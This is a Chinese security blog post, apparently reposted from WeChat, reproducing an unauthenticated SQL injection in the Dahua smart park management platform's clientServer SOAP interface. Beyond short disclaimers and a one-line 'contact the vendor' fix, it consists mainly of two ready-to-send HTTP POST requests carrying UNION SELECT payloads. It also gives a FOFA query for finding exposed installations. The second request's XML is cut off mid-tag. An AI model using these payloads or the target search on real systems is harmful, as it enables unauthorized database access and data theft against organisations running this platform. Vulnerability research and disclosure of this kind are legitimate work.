大华智慧园区综合管理平台SQL注入漏洞复现

admin

138858
文章

114
评论

2024年4月8日11:27:57评论124 views字数 2001阅读6分40秒阅读模式

点击蓝字关注我们

免责声明

本文发布的工具和脚本，仅用作测试和学习研究，禁止用于商业用途，不能保证其合法性，准确性，完整性和有效性，请根据情况自行判断。

如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利，则应及时通知并提供身份证明，所有权证明，我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用，任何人不得将其应用于非法用途及盈利等目的，间接使用文章中的任何工具、思路及技术，我方对于由此引起的法律后果概不负责。

0x00 简介

大华智慧园区综合管理平台是一个集成化的管理中枢，以智能化、数据化和高效化为核心，实现园区的全方位管理与服务。该平台集成了多种信息系统和设备，通过统一的数据接口，实现数据的互通互联和集中管理，提高了数据的利用效率。该平台运用人工智能、大数据等技术，对园区的安全、能源、环境等进行智能化监控和管理，确保园区的安全稳定与高效运行。同时，平台还具备业务流程优化和协同管理功能，能够提升园区内各部门间的协作效率。此外，大华智慧园区综合管理平台还通过大数据分析，为园区管理者提供决策支持，助力园区的可持续发展。该平台以其高效、智能、便捷的特点，为园区的现代化管理注入了新的活力，成为推动园区智慧化建设的重要力量。

0x01 漏洞概述

大华智慧园区综合管理平台clientServer接口处未对用户的输入进行过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。未授权攻击者可利用此漏洞获取敏感信息。

0x02 影响版本

dahua-智慧园区综合管理平台

0x03 环境搭建

fofa-query: app=“dahua-智慧园区综合管理平台”

0x04 漏洞复现

漏洞链接：https://127.0.0.1/portal/services/clientServer

漏洞数据包：

POST /portal/services/clientServer HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Type: text/xml;charset=UTF-8
Content-Length: 421

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
  <soapenv:Header/>
  <soapenv:Body>
  <cli:getGroupInfoListByGroupId>
    <!--type: string-->
      <arg0>-5398) UNION ALL SELECT 5336,5336,5336,5336,user()-- -</arg0>
    <!--type: long-->
    <arg1>10</arg1>
    </cli:getGroupInfoListByGroupId>
    </soapenv:Body>
  </soap:Envelope>

执行user()函数
大华智慧园区综合管理平台SQL注入漏洞复现

执行md5(1)

POST /portal/services/clientServer HTTP/1.1
Host:xxx
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
  <soapenv:Header/>
  <soapenv:Body>
  <cli:getGroupInfoListByGroupId>
    <!--type: string-->
      <arg0>-5398) UNION ALL SELECT 5336,5336,5336,5336,md5(123456)-- -</arg0>
    <!--type: long-->
    <arg1>10</arg1>
    </cli:getGroupInfoListByGroupId>
    </soapenv:Body>
  </soapenv:E

大华智慧园区综合管理平台SQL注入漏洞复现

0x05 修复方式

联系厂商获取升级补丁以修复漏洞。

原文始发于微信公众号（SecHub网络安全社区）：大华智慧园区综合管理平台SQL注入漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

大华智慧园区综合管理平台SQL注入漏洞复现

0x00 简介

0x01 漏洞概述

0x02 影响版本

0x03 环境搭建

0x04 漏洞复现

0x05 修复方式

Windows提权漏洞CVE-2025-21204

漏洞预警博华X龙防火墙系统 arp_scan文件读取漏洞

网安人的咯噔文学|CVE-2025-404NotFound？

CVE-2025-21204: Windows Update Stack 中的不当链接跟随导致的权限提升

Windows 提权漏洞速报：CVE-2025-21204

Jupyter Remote Desktop未授权访问漏洞CVE-2025-32428

F5 BIG-IP命令注入漏洞CVE-2025-23239

三星路由器WLAN-AP-WEA453e-未授权RCE等多个漏洞 POC

CVE-2025-24071｜Windows 文件资源管理器欺骗漏洞

CVE-2024-22243 Spring Web UriComponentsBuilder URL 解析不当漏洞分析

发表评论

在线咨询

微信